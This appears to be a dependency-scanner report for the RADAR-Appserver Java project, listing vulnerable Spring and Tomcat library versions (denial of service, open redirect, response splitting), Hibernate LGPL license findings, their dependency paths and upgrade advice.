Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Denial of Service (DoS) when providing a specially crafted HTTP request.
To be vulnerable, these conditions must all be met (which is usually the case for applications dependent on org.springframework.boot:spring-boot-actuator):
The affected application uses Spring MVC or Spring WebFlux.
io.micrometer:micrometer-coreis on the classpath.An
ObservationRegistryis configured in the application to record observations.
Workaround
This vulnerability can be avoided by disabling web observations: management.metrics.enable.http.server.requests=false
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.springframework:spring-web to version 6.0.14 or higher.
References
medium severity
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.53.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Open Redirect via the LoadBalancerDrainingValve.invoke() function. When the LoadBalancerDrainingValve is in the disabled (draining) state, an attacker can redirect users to a malicious attacker-controlled URL.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.116, 10.1.53, 11.0.20 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-web
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to HTTP Response Splitting via the Content-Disposition header where the filename parameter value could contain non-printable characters, causing parsing issues for HTTP clients. An attacker can cause the download of files containing malicious commands by injecting content into the response.
Notes:
This is only exploitable if the header is prepared with
org.springframework.http.ContentDisposition, the filename is set viaContentDisposition.Builder#filename(String, Charset), the value is derived from unsanitized user input, and the attacker can inject malicious content into the downloaded response.The vulnerability was also fixed in the 6.0.29 commercial version.
Remediation
Upgrade org.springframework:spring-web to version 6.1.21, 6.2.8 or higher.
References
medium severity
new
- Module: org.hibernate.common:hibernate-commons-annotations
- Introduced through: org.liquibase.ext:liquibase-hibernate6@4.20.0 and org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-core@6.1.7.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-envers@6.1.7.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-envers@6.1.7.Final › org.hibernate.orm:hibernate-core@6.1.7.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.hibernate.orm:hibernate-core@6.1.7.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final
LGPL-2.1 license
medium severity
- Module: org.hibernate.orm:hibernate-core
- Introduced through: org.liquibase.ext:liquibase-hibernate6@4.20.0 and org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-core@6.1.7.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-envers@6.1.7.Final › org.hibernate.orm:hibernate-core@6.1.7.Final
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.hibernate.orm:hibernate-core@6.1.7.Final
LGPL-2.1 license
medium severity
- Module: org.hibernate.orm:hibernate-envers
- Introduced through: org.liquibase.ext:liquibase-hibernate6@4.20.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.liquibase.ext:liquibase-hibernate6@4.20.0 › org.hibernate.orm:hibernate-envers@6.1.7.Final
LGPL-2.1 license
low severity
- Vulnerable module: org.springframework:spring-context
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-web-server@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot-persistence@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework.boot:spring-boot-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6
-
